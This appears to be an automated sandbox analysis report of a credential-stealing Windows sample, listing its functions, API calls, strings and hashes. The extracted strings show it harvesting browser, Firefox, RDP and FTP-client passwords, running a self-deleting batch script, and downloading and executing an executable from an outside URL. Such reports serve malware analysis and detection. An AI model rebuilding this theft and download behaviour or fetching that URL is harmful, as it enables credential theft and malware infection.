Opcode Fuzzy Hash: 60ed86e535dc6f4d37373210e17f1fc447725754a780f13e0bb98d9f5e9b3016
Instruction Fuzzy Hash: 20311B70904208ABEB21AF61DE89BED7BB5BB04304F1041B7E505B11E1D7B89B85CE19

Function 00410042 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

123456, xrefs: 00410125, 00410139
, xrefs: 0041014D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: $123456
API String ID: 0-521589362
Opcode ID: 484f20930e069a74e012fbf44b05a2d4cfccbb939365b68dd33aae01d2831020
Instruction ID: 56bff48c1d68297c5634c15b7123a5550f21f9c79597928d9221fdbdd2aa2f2f
Opcode Fuzzy Hash: 484f20930e069a74e012fbf44b05a2d4cfccbb939365b68dd33aae01d2831020
Instruction Fuzzy Hash: CC513B70904208FBEF119FA1DD46BDEBEB5AB44304F548066E504A91A2C7FA8AD4DB28

Function 0040A391 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A3C5
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A44F
lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A46E
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A48D
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A4A6
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A4EC
LocalFree.KERNEL32(?), ref: 0040A519
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A543

Strings

DPAPI: , xrefs: 0040A49A
MS IE FTP Passwords, xrefs: 0040A481
Internet Explorer, xrefs: 0040A443
WininetCacheCredentials, xrefs: 0040A462

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 2957877119-3076635702
Opcode ID: d1fbfc7de99e8a1c9f02b83199f86e098cebef76abaed47ae6285e4a46ddf08e
Instruction ID: 0834c845e949aa4d4731b5581efcecee0a3f63d7663d6ae8f589aa7b01491016
Opcode Fuzzy Hash: d1fbfc7de99e8a1c9f02b83199f86e098cebef76abaed47ae6285e4a46ddf08e
Instruction Fuzzy Hash: 73412A7290021CAADF219F50CC42FDA7AB9BF08304F4484E9F64475090DBB99AE59FD9

Function 0040BA61 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BB18
LocalFree.KERNEL32(00000000,?), ref: 0040BB53
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB94
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA2
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBB0
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBBE
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBCC
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBDA

Strings

http://, xrefs: 0040BBAB, 0040BBB6
ftp://, xrefs: 0040BB8F, 0040BB9A
https://, xrefs: 0040BBC7, 0040BBD2

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: aecf51c85739bb9039beee7140967baf2a85c31927b49e32ff767d93cc1d15a2
Instruction ID: 05f63e031c690ac09b10849756e13855a18b746bd5dec6cc88aabe71e4e14f4a
Opcode Fuzzy Hash: aecf51c85739bb9039beee7140967baf2a85c31927b49e32ff767d93cc1d15a2
Instruction Fuzzy Hash: A751D63291020DFADF11ABA1ED41FEE7B7AEF04704F50813AF511B11A1DB799A90DB58

Function 0040879B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 0040880B
lstrcmpiA.KERNEL32(00414FF5,?), ref: 00408834
lstrcmpiA.KERNEL32(00414FF7,?), ref: 00408851
FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 004088F8
FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 0040890B

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

*.*, xrefs: 004087DA
\*.*, xrefs: 004087CB

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 3965ebb162f110cf4f9291f582e9820642276b0733d5a9ae705261ccb80d2748
Instruction ID: 42ba9e4e03238b903e96c900c4e4fe61deb1c16cbd32061e38acb72b00e4b131
Opcode Fuzzy Hash: 3965ebb162f110cf4f9291f582e9820642276b0733d5a9ae705261ccb80d2748
Instruction Fuzzy Hash: AC315071900219AAEF21BF21CD41AED77A9AF04308F5084BFB448B51F2DF7D8AD19A59

Function 00BA2110 Relevance: 10.6, APIs: 7, Instructions: 147windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1C70: GetVersionExA.KERNEL32 ref: 00BA1C94

MessageBoxIndirectA.USER32(00000000), ref: 00BA212A
MessageBoxExA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA213A
EndDialog.USER32(00000000,00000000), ref: 00BA2144
SendDlgItemMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA2154
ExitProcess.KERNEL32 ref: 00BA215C

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: Message$DialogExitIndirectItemProcessSendVersion
String ID:
API String ID: 3504329115-0
Opcode ID: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
Instruction ID: e237a94bdd837a8066ac5d801f9d199556e68e124c672510adbb66228d11aa58
Opcode Fuzzy Hash: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
Instruction Fuzzy Hash: D2213C337AC2026BEB5CEF749D27B7F26D79B06611F42C87EA207CA0D1ED709404465A

Function 0040CC68 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 0040CD0D
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CD73
LocalFree.KERNEL32(00000000), ref: 0040CD9A

Strings

password 51:b:, xrefs: 0040CCCC
full address:s:, xrefs: 0040CCDF
username:s:, xrefs: 0040CCB9

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: 24e5556bb99432440df1035ff8fbdcba4e7bb0ba52b33656ebd5752b605b387f
Instruction ID: 40a455db09f3bf5b6d636c3d1dac8bf0f1d2c5233aaa4dd17742d86c61909a7d
Opcode Fuzzy Hash: 24e5556bb99432440df1035ff8fbdcba4e7bb0ba52b33656ebd5752b605b387f
Instruction Fuzzy Hash: 46413632910109EAEF11ABE1C986BEEBFB5EF44314F10013BE600B11E0D67D5A92DB69

Function 0040A798 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A80A
lstrlenW.KERNEL32(004163A8,?,?,00000000), ref: 0040A848
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A878
LocalFree.KERNEL32(00000000), ref: 0040A8AA
CredFree.ADVAPI32(00000000), ref: 0040A8C8

Strings

Microsoft_WinInet_*, xrefs: 0040A805

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*
API String ID: 3891647360-439986189
Opcode ID: a97b6aa37169208cde01b248676f0b91efa0178134f4b94e29171a3a14f4019e
Instruction ID: 10cc8d598a7a28ed956ec4de8eddf5bcd684f035a39353e3847c60dc5f03db00
Opcode Fuzzy Hash: a97b6aa37169208cde01b248676f0b91efa0178134f4b94e29171a3a14f4019e
Instruction Fuzzy Hash: 2F313C72850309EFEF209F84DC05BEEB7B4AB04315F14807AE510B22E0D3B89A95DB5A

Function 00BA229A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00BA2504
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BA2519
UnhandledExceptionFilter.KERNEL32(00BA7130), ref: 00BA2524
GetCurrentProcess.KERNEL32(C0000409), ref: 00BA2540
TerminateProcess.KERNEL32(00000000), ref: 00BA2547

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
Instruction ID: 31477684e88f4f4d7b12601cd1be02b789d14066a292e1f330abedc49fff2d35
Opcode Fuzzy Hash: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
Instruction Fuzzy Hash: 4B21EEB8948604EFD710DF68FD8A6857BE0FB4A320F50505AE90987360EFB05A84EF59

Function 0040A94F Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040A964
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
LocalFree.KERNEL32(00000000), ref: 0040AA4F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID:
API String ID: 2920030623-0
Opcode ID: 3ee5b7e1c82f1607e2cda8437f5978eb28178e04f6d36369c44489f08c675a6e
Instruction ID: 98b09c9b8ad4cb5ed3de69e9071a18d604a0b9919213ab1aa4454306ae46edfb
Opcode Fuzzy Hash: 3ee5b7e1c82f1607e2cda8437f5978eb28178e04f6d36369c44489f08c675a6e
Instruction Fuzzy Hash: 2D31D6B37002089BEF209EA4D944BCEB765FB85360F508433E951B62C0D27C9A92CF5E

Function 00404313 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404372
CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040438E
FreeSid.ADVAPI32(?), ref: 004043A2

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: fc0c390258a6503db38d0b7472b0550f8c88649682f8a07c647c536adc60a40c
Instruction ID: 8546a107585b055a91af00dfa413d36e2a1cedd3d7a951e8ccb16bcb1636ec09
Opcode Fuzzy Hash: fc0c390258a6503db38d0b7472b0550f8c88649682f8a07c647c536adc60a40c
Instruction Fuzzy Hash: D5115270604248EEEB11CBA4DC1EBDE7BF4AB5030AF0981B5D550EB2E1D3B9E508C75A

Function 0040421D Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
LocalFree.KERNEL32(00000000), ref: 0040429D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: ed0a268b04ac00425a08792f81ecd71c415b08711814e6f8b313b0fdd32c7a25
Instruction ID: 5bc2afcd4b249a915aab4cd4489415848167be074806362298e41e3550db9fc6
Opcode Fuzzy Hash: ed0a268b04ac00425a08792f81ecd71c415b08711814e6f8b313b0fdd32c7a25
Instruction Fuzzy Hash: DB11F875A04208EBDF118F95DC84BDEBBB5FB84350F1484BABA15662D0C378AA50CB58

Function 00BA3595 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00BA235C), ref: 00BA359D
__mtterm.LIBCMT ref: 00BA35A9

Part of subcall function 00BA32E2: DecodePointer.KERNEL32(FFFFFFFF,00BA370B,?,00BA235C), ref: 00BA32F3
Part of subcall function 00BA32E2: TlsFree.KERNEL32(FFFFFFFF,00BA370B,?,00BA235C), ref: 00BA330D
Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(00000000,00000000,00008DD4,?,00BA370B,?,00BA235C), ref: 00BA3A73
Part of subcall function 00BA32E2: _free.LIBCMT ref: 00BA3A76
Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(FFFFFFFF,00008DD4,?,00BA370B,?,00BA235C), ref: 00BA3A9D

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BA35BF
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BA35CC
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BA35D9
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BA35E6
TlsAlloc.KERNEL32(?,00BA235C), ref: 00BA3636
TlsSetValue.KERNEL32(00000000,?,00BA235C), ref: 00BA3651
__init_pointers.LIBCMT ref: 00BA365B
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA366C
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3679
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3686
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3693
DecodePointer.KERNEL32(00BA3466,?,00BA235C), ref: 00BA36B4
__calloc_crt.LIBCMT ref: 00BA36C9
DecodePointer.KERNEL32(00000000,?,00BA235C), ref: 00BA36E3
GetCurrentThreadId.KERNEL32 ref: 00BA36F5

Strings

FlsFree, xrefs: 00BA35DB
FlsAlloc, xrefs: 00BA35B9
KERNEL32.DLL, xrefs: 00BA3598
FlsSetValue, xrefs: 00BA35CE
FlsGetValue, xrefs: 00BA35C1

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
Instruction ID: 4f11bc8fa9b280f1c531659781a39aa058b0c47e0b1ee7d7505a2adfcfd418cf
Opcode Fuzzy Hash: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
Instruction Fuzzy Hash: 2E311871D4C210AAC761AF78AC0AA1A3FE4FB57B61B1045AAF414D32B4EF748940CF69

Function 00409312 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON

Download Yara Rule

Strings

#2d, xrefs: 00409395
ftp://, xrefs: 004094E5, 004094F0
---, xrefs: 00409617
https://, xrefs: 0040951D, 00409528
#2c, xrefs: 00409387
http://, xrefs: 00409501, 0040950C
#2e, xrefs: 004093A3
ftp., xrefs: 00409540, 0040954B

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: 7316a092c6bce59c1a320b3b349cebaea51de05526983b00ea3a9117e995390f
Instruction ID: f88e77904a974f6789c6144af8938d399e0414cbc12fc8393a9b67a2f52b948b
Opcode Fuzzy Hash: 7316a092c6bce59c1a320b3b349cebaea51de05526983b00ea3a9117e995390f
Instruction Fuzzy Hash: 4F910671D00209BADF11AFA2DC46BEEBEB1AF04348F20443BF410711E2DBB94E919B59

Function 0040FDE5 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 118stringfilelibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GetModuleFileNameA.KERNEL32(00000000,00000105,00000104,00000105,00000105), ref: 0040FE25
GetTempPathA.KERNEL32(00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE37
lstrcatA.KERNEL32(00000105,abcd.bat,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE4B
CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE64
lstrcpyA.KERNEL32(00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE77
StrRChrIA.SHLWAPI(00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105), ref: 0040FE83
lstrcpyA.KERNEL32(00000001,abcd.bat,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105), ref: 0040FE93
CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000), ref: 0040FEAA
lstrlenA.KERNEL32( :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FEBA
CloseHandle.KERNEL32(00000104,00000000, :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105), ref: 0040FED1
wsprintfA.USER32 ref: 0040FEE8
LoadLibraryA.KERNEL32(shell32.dll), ref: 0040FEF5
GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0040FF04

Strings

:ijk del %1 if exist %1 goto ijk del %0 , xrefs: 0040FEB5, 0040FEC0
shell32.dll, xrefs: 0040FEF0
ShellExecuteA, xrefs: 0040FEFE
"%s" , xrefs: 0040FEE0
open, xrefs: 0040FF17
abcd.bat, xrefs: 0040FE43, 0040FE8D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: File$Createlstrcpy$AddressAllocCloseHandleLibraryLoadLocalModuleNamePathProcTemplstrcatlstrlenwsprintf
String ID: :ijk del %1 if exist %1 goto ijk del %0 $ "%s" $ShellExecuteA$abcd.bat$open$shell32.dll
API String ID: 1579379117-2346035512
Opcode ID: 6ff2742ab80524d4d8df907e34ab60c14ef88219d1e76b9ce8b3f2491aecbe1c
Instruction ID: 2260d78383d4395a4199572d39aba8ac31190bab2c2c27c71c8886b9e3b055a2
Opcode Fuzzy Hash: 6ff2742ab80524d4d8df907e34ab60c14ef88219d1e76b9ce8b3f2491aecbe1c
Instruction Fuzzy Hash: AE313E31F442097AEF2177A28C03FEE7922AB44B48F2484377620B55E6DAF95A915A1C

Function 0040FBEC Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401770: GetHGlobalFromStream.OLE32(?,?), ref: 0040177D
Part of subcall function 00401770: GlobalLock.KERNEL32(?), ref: 00401794
Part of subcall function 00401770: GlobalUnlock.KERNEL32(?), ref: 004017AC

wsprintfA.USER32 ref: 0040FC4E
GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FCC1
GetTickCount.KERNEL32 ref: 0040FCD9
wsprintfA.USER32 ref: 0040FCEB
CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FCFC
lstrlenA.KERNEL32(true,?,00000000), ref: 0040FD64
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FD8D

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

true, xrefs: 0040FD5F, 0040FD6A
http://ftp.approachit.com/jZy.exe, xrefs: 0040FBEC, 0040FC01
%d.exe, xrefs: 0040FCDF
open, xrefs: 0040FD86
%02X, xrefs: 0040FC42
MZ, xrefs: 0040FCA5

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Globallstrlen$wsprintf$CountCreateDirectoryExecuteFromLockPathShellStreamTempTickUnlocklstrcatlstrcpy
String ID: %02X$%d.exe$MZ$http://ftp.approachit.com/jZy.exe$open$true
API String ID: 3844566713-121843707
Opcode ID: 53601dfb8e76c8308079200fdef8aab2425115c71132ffc9e050d7584662b6bc
Instruction ID: 279c515f677962acfde49643876b8489b39d673ed7fb2dc107904c3fec3fc2cb
Opcode Fuzzy Hash: 53601dfb8e76c8308079200fdef8aab2425115c71132ffc9e050d7584662b6bc
Instruction Fuzzy Hash: AC414C71904228AADB30ABA18C46FEEB7B9AF05305F1045F7B548B14E1D6BC8EC49F59

Function 004090A5 Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON

Download Yara Rule

Strings

ftp://, xrefs: 004091B2, 004091BD
https://, xrefs: 004091EA, 004091F5
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00409128
http://, xrefs: 004091CE, 004091D9
mozsqlite3.dll, xrefs: 004090E3
sqlite3.dll, xrefs: 004090F6
ftp., xrefs: 0040920D, 00409218

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
API String ID: 0-3560805513
Opcode ID: be895cb03f50841b83d8b00f3619420343b3a876b762255af2831097d856b825
Instruction ID: c28b628ff21c7aed5412b5d5122e17c4509d94f0c1cd4b3173a2c6c0672043ef
Opcode Fuzzy Hash: be895cb03f50841b83d8b00f3619420343b3a876b762255af2831097d856b825
Instruction Fuzzy Hash: FB510770940109BADF11ABA5CC06EEE7E75AF04348F10847BB515B01E3DBBD8EA0AA5D

Function 0040AA69 Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

wsprintfA.USER32 ref: 0040AAD5
wsprintfA.USER32 ref: 0040AAE8
wsprintfA.USER32 ref: 0040AAFB
wsprintfA.USER32 ref: 0040AB0E
wsprintfA.USER32 ref: 0040AB21
wsprintfA.USER32 ref: 0040AB34
wsprintfA.USER32 ref: 0040AB47

Part of subcall function 0040A94F: lstrlenA.KERNEL32(?), ref: 0040A964

Part of subcall function 0040A94F: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
Part of subcall function 0040A94F: LocalFree.KERNEL32(00000000), ref: 0040AA4F

Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF

Strings

SiteServer %d\SFTP, xrefs: 0040AB3F
SiteServer %d\WebUrl, xrefs: 0040AAE0
SiteServer %d\Host, xrefs: 0040AACD
SiteServer %d\Remote Directory, xrefs: 0040AAF3
SiteServer %d-User, xrefs: 0040AB06
%s\Keychain, xrefs: 0040AB2C
SiteServer %d-User PW, xrefs: 0040AB19

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 3846021373-1012938452
